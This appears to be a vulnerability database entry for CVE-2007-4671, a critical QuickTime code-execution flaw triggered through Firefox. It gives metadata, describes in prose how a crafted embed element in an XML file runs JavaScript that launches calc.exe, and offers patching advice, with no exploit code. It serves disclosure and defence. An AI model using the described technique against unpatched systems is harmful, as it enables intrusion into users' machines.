vendor: QuickTime
by: Unknown
CVSS: 9 (CRITICAL)
Remote Code Execution
CWE: 94
Product Name: QuickTime
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CVE: CVE-2007-4671
CPE: a:apple:quicktime
Platforms Tested: Windows
2007
QuickTime media formats vulnerability in Firefox
This vulnerability allows QuickTime media formats to execute arbitrary code in Firefox, potentially leading to a full compromise of the browser and underlying operating system. The exploit uses a specially crafted embed element in an XML file to execute a JavaScript command that launches the Windows calculator (calc.exe).
Mitigation:
To mitigate this vulnerability, users should update their versions of QuickTime and Firefox to the latest available versions. Additionally, users should exercise caution when opening or accessing media files from untrusted sources.